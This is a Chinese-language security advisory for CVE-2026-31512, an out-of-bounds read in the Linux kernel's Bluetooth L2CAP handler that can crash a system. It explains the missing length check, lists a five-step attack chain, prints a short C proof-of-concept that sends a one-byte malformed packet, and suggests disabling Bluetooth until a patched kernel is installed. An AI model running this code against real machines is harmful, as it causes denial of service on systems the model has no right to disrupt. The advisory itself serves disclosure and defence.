CVE-2026-31512 CVSS 5.5 中危

CVE-2026-31512 Linux内核蓝牙L2CAP越界读取漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31512

漏洞类型

越界读取

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核蓝牙子系统的L2CAP模块存在安全漏洞。在`l2cap_ecred_data_rcv()`函数中，系统未验证PDU长度即读取SDU长度字段。当接收到的数据包长度小于2字节时，会导致越界读取。本地低权限攻击者可利用此漏洞造成系统崩溃或拒绝服务。

技术细节

该漏洞位于Linux内核的蓝牙协议栈L2CAP层，具体涉及增强信用基础流控制的数据接收处理函数。该函数直接调用`get_unaligned_le16()`从`skb->data`读取SDU长度，却未先调用`pskb_may_pull()`检查`skb`是否包含至少2字节的数据。当攻击者发送特制的畸形蓝牙数据包，使得`skb->len`小于2时，内核将读取无效内存地址。这种越界访问通常会触发内核错误，导致系统崩溃，从而实现拒绝服务攻击。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限访问权限。

STEP 2

步骤2

攻击者利用蓝牙接口发送特制的畸形L2CAP数据包。

STEP 3

步骤3

内核执行`l2cap_ecred_data_rcv()`函数处理数据包。

STEP 4

步骤4

由于未验证长度，函数读取越界内存，触发内核异常。

STEP 5

步骤5

系统崩溃或重启，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31512
 * Trigger Out-of-Bounds Read in l2cap_ecred_data_rcv
 */
#include <bluetooth/bluetooth.h>
#include <bluetooth/l2cap.h>
#include <sys/socket.h>
#include <unistd.h>

int main() {
    int sock;
    struct sockaddr_l2 addr = {0};
    // Malformed packet with length < 2 (L2CAP_SDULEN_SIZE)
    char malformed_packet[1] = {0x00};

    // Create Bluetooth L2CAP raw socket
    sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP);
    if (sock < 0) return -1;

    // Set target address (Requires target MAC)
    addr.l2_family = AF_BLUETOOTH;
    // str2ba("00:11:22:33:44:55", &addr.l2_bdaddr);
    
    // Send malformed packet to trigger the vulnerability
    // Note: Target must be in a state to process ECRED data
    sendto(sock, malformed_packet, sizeof(malformed_packet), 0, 
           (struct sockaddr *)&addr, sizeof(addr));

    close(sock);
    return 0;
}

影响范围

Linux Kernel（修复前版本）

防御指南

临时缓解措施

如果无法立即升级内核，建议暂时禁用系统蓝牙服务以阻断本地攻击向量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表